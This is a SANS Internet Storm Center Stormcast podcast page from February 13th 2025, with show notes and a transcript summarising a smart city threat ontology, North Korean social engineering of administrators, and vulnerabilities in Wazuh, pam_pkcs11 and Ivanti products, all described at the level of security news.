Handler on Duty: Didier Stevens
Threat Level: green
Podcast Detail
SANS Stormcast Feb 13th 2025: Smart City Threats; Advanced Social Engineering Attacks; Wazuh Vulnerability; PAM Vulnerability; Ivanti Patches
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9322.mp3
Smart City Threats; Advanced Social Engineering Attacks; Wazuh Vulnerability; PAM Vulnerability; Ivanti Patches
00:00
My Next Class
| Network Monitoring and Threat Detection In-Depth | Baltimore | Mar 3rd - Mar 8th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
An Ontology for Threats: Cybercrime and Digital Forensic Investigation on Smart City Infrastructure
Smart cities is a big topic for many local governments. With building these complex systems, attacks will follow.
https://isc.sans.edu/diary/An%20ontology%20for%20threats%2C%20cybercrime%20and%20digital%20forensic%20investigation%20on%20Smart%20City%20Infrastructure/31676
North Korean state actor tricking admins into executing PowerShell
North Korean state actors are spending quite a bit of effort setting up relationships with South Korean system administrators, culminating in them getting tricked into executing malicious PowerShell scripts.
https://x.com/MsftSecIntel/status/1889407814604296490
Wazuh Vulnerability
A deserialization vulnerability in Wazuh may lead to an unauthenticated remote code execution vulnerability
https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
PAM PKCS11 Vulnerablity
Several vulnerabilities in the Linux PAM module processing smart card authentication can be used to bypass authentication
https://github.com/OpenSC/pam_pkcs11/releases/tag/pam_pkcs11-0.6.13
Ivanti Patches
Ivanti released its monhtly update, fixing a number of critical vulnerabilities in Connect Secure and other prodcuts
https://forums.ivanti.com/s/article/February-Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-and-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs?language=en_US
iTunes
MP3 Download
RSS Feed
Google
Podbean
Amazon Echo
YouTube
Spreaker
Spotify
Discussion
Login here to join the discussion.
| Network Monitoring and Threat Detection In-Depth | Baltimore | Mar 3rd - Mar 8th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 5th - May 10th 2025 |
| Network Monitoring and Threat Detection In-Depth | Baltimore | Jun 2nd - Jun 7th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Washington | Jul 14th - Jul 19th 2025 |
Podcast Transcript
Hello and welcome to the Thursday, February 13th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and I'm recording from Jacksonville, Florida. Well, today we got a diary from I Jacksonville, Florida. Well, today we got a diary from Yee Ching and Yee Ching is writing actually about a scientific paper that he and his colleagues are about to publish that deals with smart city infrastructure. Smart cities, of course, a big deal. Yee Ching is from Singapore, which has heavily signed up to implement smart city technologies. And it's kind of nice to see that people are already thinking about how to defend smart city technologies and how to securely implement them. And it's a little bit sort of what Yee Ching's post is about. They look in particular at scope. SCOPE is an ontology in order to describe smart city threats. Now, just for those of you who don't know, ontologies are essentially used to define a standardized vocabulary when you're dealing with a subject matter. You can, for example, see like the MITRE ATT&CK framework and such as an ontology. SCOPE is specifically targeting smart cities. Sadly, well, what Yee Ching found, it's not quite as applicable as they hoped yet for smart city threats. And for more details, well, I'll refer to Yee Ching's diary. And Microsoft observed an interesting technique being used by North Korean attackers against victims in South Korea, in particular targeting more sophisticated users. A lot of the times we're talking about phishing and attacks like this in social engineering. Training often focuses more on non-technical users because they're often of the more likely target here. But of course, more sophisticated users, system administrators and the like are a much more valuable target. So attackers are spending more time and effort actually getting through to these targets. That apparently is what's happening here where the attacker is first establishing a relationship with the victim in the form of emails claiming to be associated with the South Korean government in this particular case. And it all then accumulates in the attacker sending instructions in the form of a PDF how to solve a particular problem under a system. But these instructions then essentially result in actually running a PowerShell command that will install a backdoor. So this is a very dangerous attack if successful, because now you have an authorized administrator in your network running a PowerShell command, which may not necessarily trigger an alert. When you're alerting on PowerShell, you often look for users that don't execute PowerShell as part of their day-to-day work. But of course, an administrator like this may routinely run PowerShell commands to change configurations and the like on systems. So this is easily going to slip under the radar. Be aware of these attacks and definitely something if you are doing more specific training for these types of users, something to include in the training. Given that this is now a public technique, I wouldn't be too surprised if you wouldn't see this even like from organized crime and the like being used in order to infiltrate networks. And we also have a few vulnerabilities to talk about. The first one is remote code execution vulnerability in Vazuu server. Vazuu is a log monitoring, endpoint protection system. It's an open source system, but it does offer an API. And this API apparently suffers from one of those ubiquitous deserualization vulnerabilities, which then led to this vulnerability. There is no authentication required. Anybody who is able to access the API, which hopefully is only allowed to be accessed from inside your network, could potentially exploit this vulnerability. Then we have several vulnerabilities in the Palm module for smart card authentication in Linux. The vulnerabilities essentially result in authentication bypass, which of course is a critical vulnerability. Also, CVSS scores here in the high nines for these vulnerabilities. Some of these vulnerabilities may be rather trivial to exploit. It's a little bit surprising. It took so long to have them found. For example, if there's an error condition, the error condition is ignored and you're automatically logged in. Also, some of the constraints for certificates and such are not observed correctly. Definitely something that you need to address quickly. And I would think by now you will find some updates just via your normal Linux distributions update channels. But then back to the friends of the show, as I call them, for all the content they're providing. Ivanti has released their February update. In particular, a number of critical vulnerabilities are being addressed in Ivanti Connect Secure, but also other Ivanti products are affected. And well, that's it for today. Just a quick note about yesterday's podcast. I mentioned the iOS, iPadOS patches. Well, there was also a macOS update, but it did not address any security patches. There was a question that came up from a couple of listeners. That's it for today. Thanks for listening and talk to you again tomorrow. Bye.
Learn about the Internet Storm Center and our volunteer InfoSec handlers
© 2025 SANS™ Internet Storm Center
Developers: We have an API for you! 